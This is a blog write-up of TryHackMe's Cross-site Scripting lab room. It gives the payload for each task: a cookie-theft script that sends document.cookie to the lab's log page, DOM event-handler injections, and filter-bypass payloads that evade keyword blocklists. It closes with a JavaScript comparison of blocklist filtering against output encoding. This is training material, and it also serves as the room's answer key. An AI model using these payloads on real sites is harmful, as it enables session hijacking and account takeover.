The Dutch Hacker
Cross-site Scripting writeup

Cross-site Scripting on Tryhackme

This is the write-up for the room Cross-site Scripting on TryHackMe, which is part of the Web Fundamentals Path.

Connect to the TryHackMe lab environment over the VPN, or use the AttackBox on the TryHackMe site.

Tasks Cross-site Scripting

Task 1

Read all that is in this task and press complete

Task 2

Start the machine attached to this task. Then navigate to http://MACHINE_IP

Task 3

Read all that is in the task

3.1 Add a comment and see if you can insert some of your own HTML.

Basically any HTML tag will do.

Type in the following

 <!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>

<h1>This is a Heading</h1>
<p>This is a paragraph.</p>

</body>
</html> 

3.2 Create an alert popup box appear on the page with your document cookies.

document.cookie is the JavaScript property that returns the cookies for the current page.

Type in the following

<script>alert(document.cookie)</script>

3.3 Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.

This can be done with a script tag. Type in the following

<script>document.querySelector('#thm-title').textContent = 'I am a Hacker'</script>

The answer to this question will appear on the page itself, not in a popup.

3.4 Take over Jack’s account by stealing his cookie, what was his cookie value?

As the hint says, they made things easy: you can write the cookie to the log.

Type in the following

<script>document.location='/log/'+document.cookie</script> 

Now navigate to http://MACHINE_IP/logs

See the cookie

Now copy the cookie value (the part after connect.sid). This is also the answer to the question.

3.5 Post a comment as Jack.

We still have the cookie. Press F12 while on the page and select Storage.

Change the value of this cookie to the one in the log.

Reload the page and post a comment.

Task 4

4.1 Craft a reflected XSS payload that will cause a popup saying “Hello”

Type in the following, and also notice the URL

<script>alert("Hello")</script>

4.2 Craft a reflected XSS payload that will cause a popup with your machines IP address.

Type in the following

<script>alert(window.location.hostname)</script>

Task 5

5.1 Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.

Type in the following

test" onmouseover="alert('Hover over the image and inspect the image element')"

Now move the mouse over the "image not found" text. A popup will appear, so we now know it is working.

Type in the following command

test" onmouseover="alert(document.cookie)"

The next popup will have the answer

5.2 Create an onhover event on an image tag, that change the background color of the website to red.

Type in the following code

test" onmouseover="document.body.style.backgroundColor = 'red';

Task 6

Read all that is in the task, navigate to the "IP and Port Scanning with XSS" tab and read the explanation of the code. Press complete when ready.

Task 7

You can copy the key logger code and paste it into the stored XSS page.

Task 8

8.1 Bypass the filter that removes any script tags.

<img src=x onerror=alert('Hello');>

8.2 The word alert is filtered, bypass it.

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

8.3 The word hello is filtered, bypass it.

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>

8.4 The following is filtered in challenge 4:

  • word “Hello”
  • script
  • onerror
  • onsubmit
  • onload
  • onmouseover
  • onfocus
  • onmouseout
  • onkeypress
  • onchange

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
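
Why the Task 8 filters keep failing, shown as an added example that is not part of the original write-up or the room's code: a blocklist built from the 8.4 word list is compared with output encoding, using the 8.3/8.4 payload from this page as input. The function names (blocklistFilter, escapeHtml, liveHandlers, compare) are hypothetical, and the filter's strip-until-stable behaviour is an assumption about how such a filter might work.

```javascript
// Words the page lists as filtered in challenge 8.4.
const BLOCKED = ['hello', 'script', 'onerror', 'onsubmit', 'onload', 'onmouseover',
  'onfocus', 'onmouseout', 'onkeypress', 'onchange'];

// Hypothetical blocklist filter (an assumption, not the room's implementation):
// strips blocked words case-insensitively and repeats until the output is stable,
// so split-word tricks such as "scrscriptipt" are removed as well.
function blocklistFilter(input) {
  const pattern = new RegExp(BLOCKED.join('|'), 'gi');
  let previous;
  let current = String(input);
  do {
    previous = current;
    current = current.replace(pattern, '');
  } while (current !== previous);
  return current;
}

// Output encoding for HTML text and quoted-attribute contexts.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Lists inline event-handler attributes that sit inside a real tag,
// i.e. markup the browser would still parse and wire up.
function liveHandlers(html) {
  const found = [];
  for (const tag of html.match(/<[a-z][^>]*>/gi) || []) {
    for (const m of tag.matchAll(/\s(on[a-z]+)\s*=/gi)) found.push(m[1].toLowerCase());
  }
  return found;
}

// The 8.3/8.4 payload from this page, used as the sample input.
const sample = `<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>`;

// Runs both defences over the same input and reports what is still live.
function compare(input) {
  return {
    afterBlocklist: liveHandlers(blocklistFilter(input)),
    afterEscaping: liveHandlers(escapeHtml(input)),
    escaped: escapeHtml(input),
  };
}

console.log(compare(sample));
```

The blocklist removes the word it was told about but leaves a handler it never listed, while the encoded output contains no tag for the browser to parse at all.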

Task 9

Read all that is in the task and press complete
